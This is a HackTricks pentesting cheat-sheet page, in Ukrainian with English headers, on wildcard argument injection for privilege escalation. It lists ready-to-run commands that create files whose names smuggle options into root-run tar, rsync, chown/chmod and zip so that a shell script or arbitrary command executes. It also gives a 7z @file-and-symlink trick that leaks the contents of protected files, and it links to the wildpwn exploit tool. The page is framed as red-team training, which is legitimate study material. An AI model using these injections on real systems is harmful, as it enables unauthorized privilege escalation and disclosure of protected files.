Wildcards Spare tricks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

chown, chmod

Ви можете вказати, якого власника файлу та дозволи ви хочете скопіювати для решти файлів

touch "--reference=/my/own/path/filename"

Ви можете використати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (комбінована атака) Більше інформації в https://www.exploit-db.com/papers/33930

Tar

Виконати довільні команди:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Ви можете використати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (атака tar) Більше інформації в https://www.exploit-db.com/papers/33930

Rsync

Виконати довільні команди:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Ви можете експлуатувати це, використовуючи https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_атака rsync) Більше інформації в https://www.exploit-db.com/papers/33930

7z

У 7z навіть використовуючи -- перед * (зауважте, що -- означає, що наступний ввід не може бути розглянутий як параметри, тому в цьому випадку лише шляхи до файлів) ви можете викликати довільну помилку для читання файлу, тому якщо команда, подібна до наступної, виконується root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

І ви можете створювати файли в папці, де це виконується, ви можете створити файл @root.txt і файл root.txt, який є symlink на файл, який ви хочете прочитати:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Тоді, коли 7z виконується, він буде розглядати root.txt як файл, що містить список файлів, які він повинен стиснути (саме це вказує на наявність @root.txt), і коли 7z читає root.txt, він прочитає /file/you/want/to/read, і оскільки вміст цього файлу не є списком файлів, він видасть помилку, показуючи вміст.

Більше інформації в Write-ups of the box CTF from HackTheBox.

Zip

Виконати довільні команди:

zip name.zip files -T --unzip-command "sh -c whoami"

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Last updated